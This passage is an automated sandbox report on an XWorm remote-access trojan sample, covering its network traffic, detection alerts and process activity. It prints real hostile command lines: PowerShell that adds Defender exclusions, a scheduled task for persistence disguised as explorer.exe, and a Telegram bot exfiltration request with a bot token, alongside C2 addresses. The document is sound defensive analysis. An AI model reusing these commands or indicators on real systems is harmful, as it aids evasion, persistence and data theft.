.rsrc	0xe000	0x4c8	0x600	b0f15005f437a02551452abd11f5f6fb	False	0.3736979166666667	data	3.687734251775919	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	b262cc363c3b7e67a8ed518ddb2625b1	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe0a0	0x234	data			0.475177304964539
RT_MANIFEST	0xe2d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-02:55:00.396337	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49727	91.92.252.220	192.168.2.11
04/24/24-02:55:05.012569	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49727	91.92.252.220	192.168.2.11
04/24/24-02:55:04.716910	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49727	7000	192.168.2.11	91.92.252.220
04/24/24-02:55:05.014301	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49727	7000	192.168.2.11	91.92.252.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 02:53:09.243076086 CEST	49707	80	192.168.2.11	208.95.112.1
Apr 24, 2024 02:53:09.402692080 CEST	80	49707	208.95.112.1	192.168.2.11
Apr 24, 2024 02:53:09.402786016 CEST	49707	80	192.168.2.11	208.95.112.1
Apr 24, 2024 02:53:09.403898001 CEST	49707	80	192.168.2.11	208.95.112.1
Apr 24, 2024 02:53:09.563824892 CEST	80	49707	208.95.112.1	192.168.2.11
Apr 24, 2024 02:53:09.617363930 CEST	49707	80	192.168.2.11	208.95.112.1
Apr 24, 2024 02:53:42.270287991 CEST	80	49707	208.95.112.1	192.168.2.11
Apr 24, 2024 02:53:42.270380974 CEST	49707	80	192.168.2.11	208.95.112.1
Apr 24, 2024 02:54:00.696289062 CEST	80	49707	208.95.112.1	192.168.2.11
Apr 24, 2024 02:54:20.376957893 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:20.377000093 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:20.377075911 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:20.386337996 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:20.386354923 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.015407085 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.015481949 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:21.017395020 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:21.017402887 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.017832994 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.070640087 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:21.088691950 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:21.136121988 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.646946907 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.647022009 CEST	443	49713	149.154.167.220	192.168.2.11
Apr 24, 2024 02:54:21.647073030 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:21.653508902 CEST	49713	443	192.168.2.11	149.154.167.220
Apr 24, 2024 02:54:51.056371927 CEST	49727	7000	192.168.2.11	91.92.252.220
Apr 24, 2024 02:54:51.350985050 CEST	7000	49727	91.92.252.220	192.168.2.11
Apr 24, 2024 02:54:51.351243019 CEST	49727	7000	192.168.2.11	91.92.252.220
Apr 24, 2024 02:54:51.396555901 CEST	49727	7000	192.168.2.11	91.92.252.220
Apr 24, 2024 02:54:51.732486963 CEST	7000	49727	91.92.252.220	192.168.2.11
Apr 24, 2024 02:55:00.396337032 CEST	7000	49727	91.92.252.220	192.168.2.11
Apr 24, 2024 02:55:00.445791006 CEST	49727	7000	192.168.2.11	91.92.252.220
Apr 24, 2024 02:55:04.716909885 CEST	49727	7000	192.168.2.11	91.92.252.220
Apr 24, 2024 02:55:05.012568951 CEST	7000	49727	91.92.252.220	192.168.2.11
Apr 24, 2024 02:55:05.014301062 CEST	49727	7000	192.168.2.11	91.92.252.220
Apr 24, 2024 02:55:05.349807024 CEST	7000	49727	91.92.252.220	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 02:53:09.081634045 CEST	57887	53	192.168.2.11	1.1.1.1
Apr 24, 2024 02:53:09.235321045 CEST	53	57887	1.1.1.1	192.168.2.11
Apr 24, 2024 02:54:20.222453117 CEST	52702	53	192.168.2.11	1.1.1.1
Apr 24, 2024 02:54:20.376255989 CEST	53	52702	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 02:53:09.081634045 CEST	192.168.2.11	1.1.1.1	0x7cb1	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 02:54:20.222453117 CEST	192.168.2.11	1.1.1.1	0x950	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 02:53:09.235321045 CEST	1.1.1.1	192.168.2.11	0x7cb1	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Apr 24, 2024 02:54:20.376255989 CEST	1.1.1.1	192.168.2.11	0x950	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49707	208.95.112.1	80	1320	C:\Users\user\Desktop\X2.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 02:53:09.403898001 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 24, 2024 02:53:09.563824892 CEST	175	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 00:53:08 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49713	149.154.167.220	443	1320	C:\Users\user\Desktop\X2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 00:54:21 UTC	447	OUT	GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ABCC62BF1F171CE9AAF13%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FS1PX1XW%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-04-24 00:54:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 24 Apr 2024 00:54:21 GMT Content-Type: application/json Content-Length: 443 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-04-24 00:54:21 UTC	443	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 32 31 32 38 39 38 38 34 32 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 4f 54 4e 45 54 48 41 43 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 65 73 68 6f 6d 61 6e 64 6f 68 61 63 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 39 36 36 36 34 39 36 37 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 30 2e 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 70 65 67 61 6c 65 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 33 39 32 30 30 36 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 Data Ascii: {"ok":true,"result":{"message_id":2854,"from":{"id":2128988424,"is_bot":true,"first_name":"BOTNETHACK","username":"beshomandohack_bot"},"chat":{"id":966649672,"first_name":".0.0","username":"spegalex","type":"private"},"date":1713920061,"text":"\u2620 [XW

Target ID:	3
Start time:	02:53:04
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\X2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\X2.exe"
Imagebase:	0x850000
File size:	50'688 bytes
MD5 hash:	F8C0512008DAFF966EF349E7178D1239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2546617770.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:53:08
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:53:08
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:53:15
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe'
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:53:15
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:53:28
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:53:28
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:53:47
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:53:47
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:54:18
Start date:	24/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
Imagebase:	0x7ff6bbf40000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:54:18
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:54:20
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x1c0000
File size:	50'688 bytes
MD5 hash:	F8C0512008DAFF966EF349E7178D1239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs Detection: 66%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:54:29
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\explorer.exe"
Imagebase:	0x320000
File size:	50'688 bytes
MD5 hash:	F8C0512008DAFF966EF349E7178D1239
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:54:38
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\explorer.exe"
Imagebase:	0xd70000
File size:	50'688 bytes
MD5 hash:	F8C0512008DAFF966EF349E7178D1239
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:55:01
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x130000
File size:	50'688 bytes
MD5 hash:	F8C0512008DAFF966EF349E7178D1239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFE7E34737A Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFE7E347850

Memory Dump Source

Source File: 00000003.00000002.2570179082.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe7e340000_X2.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: e56da625c4bf802507a285cbb1496ee602cdf4ac5340af730514c94ad97a26e7
Instruction ID: a73a10201acac07d1c5d9ac464c06962219b14e34bdab0050fe933255aaa15ac
Opcode Fuzzy Hash: e56da625c4bf802507a285cbb1496ee602cdf4ac5340af730514c94ad97a26e7
Instruction Fuzzy Hash: 4131B23190861C8FDB58DF9CC88A7FD7BE0EF69321F04412AD48AD7252DB74A846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3477A1 Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFE7E347850

Memory Dump Source

Source File: 00000003.00000002.2570179082.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe7e340000_X2.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 94089631262deb6ff8cd7f42ac4417a44ade1528194e9197443363b8fbdbd9ed
Instruction ID: 9c82679ca0ffec79603917afffedd9841361c7ded43b0d7ff6c1e209a478bf7d
Opcode Fuzzy Hash: 94089631262deb6ff8cd7f42ac4417a44ade1528194e9197443363b8fbdbd9ed
Instruction Fuzzy Hash: 9231E03290875C8FCB58DF58C84A7E97BE0EF65321F08426BD489D7292DB34A846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E34B45F Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFE7E34B501

Memory Dump Source

Source File: 00000003.00000002.2570179082.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe7e340000_X2.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e7b4360a4a3474e28721d9ef082d071fda8497580f31f97f72ade75a1f5e6627
Instruction ID: 9610ca21ae7c4ac2ad54d0e3b2d3318b39f75850803b1afd8fc378ad71335272
Opcode Fuzzy Hash: e7b4360a4a3474e28721d9ef082d071fda8497580f31f97f72ade75a1f5e6627
Instruction Fuzzy Hash: AC31B431A1CA1C8FDB58EB5C98466FDB7E1EB59311F00413FD049D3662DA65A85287C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E348912 Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFE7E34AD52

Memory Dump Source

Source File: 00000003.00000002.2570179082.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe7e340000_X2.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 4b90adb35c067db3fa3f72dcc47d0c8f57ccf046edc1a475d5ea1bd32ee0829c
Instruction ID: c658f0794c5e73dde558a1ef01404430955c421a84a4add4cfe4181e5b01a9f8
Opcode Fuzzy Hash: 4b90adb35c067db3fa3f72dcc47d0c8f57ccf046edc1a475d5ea1bd32ee0829c
Instruction Fuzzy Hash: EF31A231908A188FDB28DB9CD849BFD7BE0EF55311F14412EE09AD3691DB7468868B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E34ACAF Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFE7E34AD52

Memory Dump Source

Source File: 00000003.00000002.2570179082.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe7e340000_X2.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 68f4c8441f9af35cddb6f993a10e16d313f34325311483aaad3e0f4bcfab6202
Instruction ID: 6a71be9339023bdbef6dacc5f8e7b608d80fd1a1016f00bdbca70124794c3f99
Opcode Fuzzy Hash: 68f4c8441f9af35cddb6f993a10e16d313f34325311483aaad3e0f4bcfab6202
Instruction Fuzzy Hash: EE31A231908A188FDB28DB9CD8497FD7BE0EF55311F14412EE09AD3691DB746886CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3064, Parent PID: 1320COMMON

Executed Functions

Function 00007FFE7E21E3FC Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1396851750.00007FFE7E21D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E21D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7e21d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f6bf0fa130583e4133ef40481c1a8c9da16cbeb5a39f9afcdc5b5ceeb7bbe4
Instruction ID: 656a312ea3dc568c79f4f6df198f3aefb592b399cf37b5dca938f0a7838d4483
Opcode Fuzzy Hash: 83f6bf0fa130583e4133ef40481c1a8c9da16cbeb5a39f9afcdc5b5ceeb7bbe4
Instruction Fuzzy Hash: 52112E7151CF088F9BA8EF2DE4859567BE0FB98320B10066FD459C7665DB35E882CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1397278554.00007FFE7E330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7e330000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: e805add490fbf61fa7d2e4c60d44d58f8c49e33efa8e723c0dcfc0d6c6666f79
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 0901A73111CB0C4FD744EF0CE051AA5B3E0FB85320F10052EE58AC36A1DA36E882CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E404151 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1397783597.00007FFE7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7e400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2b06b9addc5ddd7250ac276263fdbb4ff3dcd27d0932aa290ce5609d368ccf
Instruction ID: c0ea9d4e14cfa164d0e52f2fb166541d2b5be3a7c704206685466289d4848290
Opcode Fuzzy Hash: 1a2b06b9addc5ddd7250ac276263fdbb4ff3dcd27d0932aa290ce5609d368ccf
Instruction Fuzzy Hash: 12F05E32A0C5468FD665EB4CE4458A877E0EF55330B5501FBD15DCB573EA29EC418780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E404404 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1397783597.00007FFE7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7e400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69f0aa0db08de1de9602ee2899807caedb5bd73ee74709d2fb789cf107f1cf3
Instruction ID: fe25c6469600bc5ec4dc634ef5523a235797b822beb86e8ff2d48f051b5bcf15
Opcode Fuzzy Hash: a69f0aa0db08de1de9602ee2899807caedb5bd73ee74709d2fb789cf107f1cf3
Instruction Fuzzy Hash: 37F08C72A0C5468FDB64EB4DE4418A877E0FF45331B5600F7E199CB463EA2AAC41C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E406865 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1397783597.00007FFE7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7e400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31a68b0b2afd07b045dbe0273f56fa53380f8a4821fc0d426962eae0d8f9ee5
Instruction ID: 764641f451c9c53608c5efcf2a83dcbbfb2929b9b4f027b4d1f5a8f896706561
Opcode Fuzzy Hash: b31a68b0b2afd07b045dbe0273f56fa53380f8a4821fc0d426962eae0d8f9ee5
Instruction Fuzzy Hash: 81E09232A0E6884FEB55EAA868451ECBBA0DB59221F1800BFD04DD2553ED295441C355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E336620 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1397278554.00007FFE7E330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7e330000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95cd548828093aaa54af768387e3343cb1328d7c4a6eae186b4bd34d95cb055
Instruction ID: 5d041c9c4c55c3bc63244671dcdf1c6e4dfc92aba00eedb98744337499a302e0
Opcode Fuzzy Hash: c95cd548828093aaa54af768387e3343cb1328d7c4a6eae186b4bd34d95cb055
Instruction Fuzzy Hash: A2E0EC35814A4C9F8B44EF18D8099EA77E0FB68305B11465BF81ED7170DB35AA58CBC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 2452, Parent PID: 1320COMMON

